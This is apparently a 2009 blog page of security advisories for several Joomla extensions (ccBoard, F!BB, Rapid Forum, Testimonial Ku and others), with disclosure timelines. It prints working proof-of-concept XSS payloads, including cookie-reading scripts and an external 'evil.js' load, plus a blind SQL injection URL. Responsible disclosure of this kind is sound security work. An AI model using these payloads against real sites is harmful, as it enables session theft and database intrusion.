ccBoard 1.1-RC XSS Vulnerability
Thursday, 17 September 2009 00:00

The Joomla component ccBoard 1.1-RC suffers from a Cross Site Scripting vulnerability if certain conditions are met. The forum must be set up to use the internal HTML editor and not bbCode. This is the default setting upon install.

To execute, simply post a new message. Either toggle the editor to 'off' or use the HTML Source editing button, insert your JavaScript, and submit!

<script>alert('xss');</script>

The editor was even nice enough to make my XSS injection pretty upon saving:

<script type="text/javascript">// <![CDATA[
alert('xss');
// ]]></script>
Last Updated on Wednesday, 04 November 2009 22:20
F!BB 1.5.96 RC Multiple Vulnerabilities
Thursday, 17 September 2009 00:00

The Joomla component F!BB 1.5.96 RC suffers from multiple persistent XSS vulnerabilities, as well SQL Injection in its user search feature.

  1. ICQ, MSN Profile Fields XSS

    The MSN field will be rendered in the page twice.
    "><script>alert(document.cookie)</script><b f="

  2. AIM Profile Field XSS

    This vulnerability has a limited number of characters, but this will inject script:
    "><script src=//jeffchannell.com/evil.js></script
    NOTE: Skype, Gtalk, website fields are also vulnerable, though the window for injection is even smaller!

  3. Blind SQL Injection

    REQUIRES: magic_quotes_gpc OFF
    index.php?option=com_fbb&func=advsearch&q=&exactname=1&childforums=1&limitstart=0&searchuser=%' AND SUBSTRING(@@version,1,1)=5 -- '


    If MySQL is version 5, this will return results. Otherwise, no results.

Timeline

  • Vulnerabilities Discovered: 31 July 2009
  • Vendor Notified: 31 July 2009
  • Vendor Response: 31 July 2009
  • Update Available: ... 2009
  • Disclosure: 17 September 2009
Last Updated on Thursday, 30 September 2010 17:38
Rapid Forum XSS Vulnerability
Thursday, 17 September 2009 00:00

The Joomla component Rapid Forum suffers from a persistent XSS vulnerability.

This vulnerability is pretty easy to exploit, as Rapid Forum does absolutely no validation or encoding whatsoever.
<script>alert(document.cookie)</script>

Timeline

  • Vulnerabilities Discovered: 31 July 2009
  • Vendor Notified: 31 July 2009
  • Vendor Response: ... 2009
  • Update Available: ... 2009
  • Disclosure: 17 September 2009
Last Updated on Thursday, 30 September 2010 17:38
Simplest Forum BBCode Plugin 1.0.0 Beta 2 XSS Vulnerability
Thursday, 17 September 2009 00:00

The Simplest Forum BBCode Plugin 1.0.0 Beta 2 for Joomla suffers from a persistent XSS vulnerability that allows arbitrary injections of CSS rules.

[color=#FF0000;font-size:100px]XSS[/color]

Timeline

  • Vulnerabilities Discovered: 31 July 2009
  • Vendor Notified: 31 July 2009
  • Vendor Response: ... 2009
  • Update Available: ... 2009
  • Disclosure: 17 September 2009
Last Updated on Thursday, 30 September 2010 17:38
Testimonial Ku 2.0 Admin Panel Persistent XSS
Thursday, 17 September 2009 00:00

The Joomla component Testimonial Ku 2.0 is vulnerable to persistent XSS in the administrator panel. A malicious user can submit a testimonial containing <script> tags with absolutely no quotes and inject that script into the administrator panel through any of the available inputs except "email".

Fake Submission<script>alert(document.cookie)</script>

Now, when an administrator views the latest submissions, the script will execute with that admin's permissions.

Timeline

  • Vulnerabilities Discovered: 31 July 2009
  • Vendor Notified: 31 July 2009
  • Vendor Response: ... 2009
  • Update Available: ... 2009
  • Disclosure: 17 September 2009
Last Updated on Thursday, 30 September 2010 17:36
More Articles...
Page 11 of 16

Featured Extensions

$1.00
FREE
You Save: $1.00
$25.00
$3.00
FREE
You Save: $3.00
$5.00
FREE
You Save: $5.00

Latest Articles

Most Popular

The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.

Santorum
Joomla Extensions